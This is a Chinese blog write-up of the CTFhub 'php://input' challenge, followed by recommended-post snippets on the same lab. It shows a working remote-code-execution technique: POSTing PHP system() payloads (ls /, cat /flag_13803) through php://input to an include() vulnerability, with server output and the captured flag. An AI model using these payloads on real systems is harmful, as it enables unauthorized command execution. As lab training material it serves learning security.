CTFhub-RCE-php://input

最新推荐文章于 2024-08-08 18:00:00 发布
最新推荐文章于 2024-08-08 18:00:00 发布
阅读量481 收藏
点赞数
分类专栏: CTFhub-RCE 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ssss39/article/details/134381478
版权

我们需要使用php://input来构造发送的指令
查看phpinfo,找到一下字段
在这里插入图片描述
证明是可以使用php://input

1.   使用Burpsuite抓包并转至Repeater

2. 构造包

方法:POST
目标:/?file=php://input
Body:<?php system("ls /"); ?>

响应:

HTTP/1.1 200 OK
Server: openresty/1.21.4.2
Date: Mon, 13 Nov 2023 08:59:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 178
Connection: close
X-Powered-By: PHP/5.6.40
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Methods: *

bin
boot
dev
etc
flag_13803
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

<hr>
i don't have shell, how to get flag? <br>
<a href="phpinfo.php">phpinfo</a>

3. 使用cat访问flag_xxx
<?php system("cat /flag_13803")?>

flag: 
ctfhub{3dca56f1cd6b532d39ac2bde}

CTFhub php://input
qq_41497476的博客
07-27 3993
这一次相对于远程包含过滤了php://就不能直接利用 input 伪协议完成命令执行了 <?php if (isset($_GET['file'])) { if ( substr($_GET["file"], 0, 6) === "php://" ) { include($_GET["file"]); } else { echo "Hacker!!!"; } } else { highlight_file(__FILE__); } ?&g
CTFHubRCEphp://input
cx_sam的博客
08-09 640
CTF WEB RCE php://input
CTFHub | php://input
尼泊罗河伯的博客
06-08 2178
简单分析网页显示内容中的源代码,判断如果参数以 php:// 开头,那么执行 include 函数将参数值作为文件包含进来。否则,输出字符串 Hacker!!! 。
substr(php函数)
zunguitiancheng的专栏
03-31 552
http://baike.baidu.com/subview/1827482/5080396.htm                1.定义和用法              2.语法 3.参数 1.定义和用法编辑 substr() 函数返回字符串的一部分。 如果 start 参数是负数且 length 小于或等于 start,则 length 为 0。 2.语法编辑
ctfhub-RCE-文件包含 ,php://input,远程包含​,​ 读取源代码, 命令注入,过滤cat,过滤空格,过滤目录分隔符,过滤运算符,综合过滤练习
weixin_55702959的博客
02-02 4232
目录 文件包含 php://input php://input伪协议 远程包含 ​​ 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符 综合过滤练习 文件包含 打开题目发现代码中有shell.txt直接点击shell打开在post发现是没用的,于是换个方式在?file=shell.txt 进行post php://input php:// 输入输出流 PHP 提供了一些杂项输入/输出(IO)流,允许访问...
CTFHub技能树web(持续更新)--RCE--文件包含--php://input
jiuyongpinyin的博客
01-25 1165
php://input 做了两道题才知道自己对于文件包含这里完全没有什么思路,所以还是参考了大神的链接 大神链接:点我看大神链接 这道题打开的题目页: 代码的意思是检验在url的get传参中有没有file这个参数,如果有,从第0位开始,长度必须为6的参数值必须是php://(不知道我这么说,说的清不清楚),符合条件就传入,不符合就返回Hacker。 所以参考了大神链接后,get传入参数flie=php://input: [外链图片转存中…(img-z6pUNpjh-1611544235748)] yo
CTFHub-Web-RCE-文件包含
qq_54037445的博客
11-29 1065
文件包含,伪协议
CTFHUB-web-RCE
ookami6497的博客
12-03 1676
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7763
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHub技能树 Web-RCE 详解
weixin_45808483的博客
11-13 2512
RCE简介: 初学RCE(远程命令/代码执行漏洞)https://blog.youkuaiyun.com/qq_43814486/article/details/90020139 eval执行 启动环境 分析代码,提示我们将命令赋值给cmd执行 我们先查看当前位置的文件,没有什么用 /?cmd=system("ls"); 我们查看根目录文件,发现一个 flag_8999 文件 /?cmd=system("ls /"); 我们先尝试使用cat 命令查看 flag_8999文件 /..
CTFHUB-WEB-RCE【07】eval执行、文件包含
(∪.∪ )...zzz的博客
06-10 516
!!!坚持eval执行查看根目录文件查看下一级目录cat 命令读取文件文件包含构造playload 传参查看当前目录下文件下一级cat查看信息php://inputphp://input 伪协议相当于一个削弱post的方法抓包消息中<?php system("ls /");?><?php system("cat /flag_26957");?>读取源代码源代码提示flag的位置,并且限制使用伪协议php://filter 任意文件读取远程包含使用php://input 伪协议cat命
ctfhub——php://input
At0m的博客
01-14 7675
首先这道题 有一些知识需要了解。参考 《php伪协议实现命令执行的七种姿势》《php伪协议总结》 首先看一下代码,截取字符串前六个字符需要 与 php://相等,也就是file变量的值 的前六个字符需要与 php://相等。 所以写个题应该是要用到php伪协议。 有一个例子看一下 php伪协议该怎么用。 16年华山杯,源码如下: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($u
CTFHub php://input
人若无名,便可专心练剑
08-16 567
用于读取源码用于执行php代码。
CTFHUB web-rce-php://input
2301_79783285的博客
12-15 411
记录学习过程,如有错误,望大家指正,共同进步。
CTFHub技能书解题笔记-RCE-php://input
qq_43006864的博客
02-23 1710
打开题目 很熟悉的源代码界面。 简单的审计一下。 这里提到了php:// 然后if这段代码的意思是file里的前六个字符必须要等于php://(===表示强制等于) 这里回到题目,题目是php://input ,这里引入知识点: php://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data 大家..
文件包含————ctfhubphp://input
qq_45655564的博客
05-29 3176
php://input php输入流php://input的使用分析 CTFHUBphp:input 首先看到代码 <?php if (isset($_GET['file'])) { if ( substr($_GET["file"], 0, 6) === "php://" ) {#字符串的前6个必须是php://input include($_GET["file"]); } else { echo "Hacker!!!"; } } else
ctfhub php://input 解析
qq_73722777的博客
03-09 336
这里可以看见有一个判断file的前六个字符要与php://相等,于是我们可以利用php//input语句上传我们的一句话木马使其执行。php://input用于执行php代码。于是我们进行抓包,构建payload。打开网页,可以看见是一串php编码。php://input的功能如下。使用cat语句打开flag文件。得到flag,此题结束。
CTFHUB-技能树-Web题-RCE(远程代码执行)-文件包含php://input—读取源代码
Static______的博客
06-28 357
而且也没有木马文件可以用,但是它说flag在 /flag当中。而它说flag在 /flag当中那么我们直接。file的前六个字母要是php://
CTFHUB-web-RCE-php://input
weixin_68416970的博客
08-08 331
修改 GET 请求为 POST 请求,使用参数 就可以查看到目标站点中的文件,其中 system 是目标系统,括号中的内容执行命令。网页显示源代码,判断如果参数以 php:// 开头,那么执行 include 函数将参数值作为文件包含进来。在根目录发现了名字带有 flag 的文件,使用cat 命令查看这个文件发现了 flag。使用 file 查看 php://input, 感觉这个网页可能存在文件包含漏洞。刷新页面抓个包,拼接一个之后发包,响应成功。
ctfhub web rce
最新发布
01-14
### CTFHub Web RCE Challenge Resources and Solutions #### Understanding Remote Code Execution (RCE) Remote Code Execution vulnerabilities allow attackers to execute arbitrary commands on a target ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

斜躺青年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值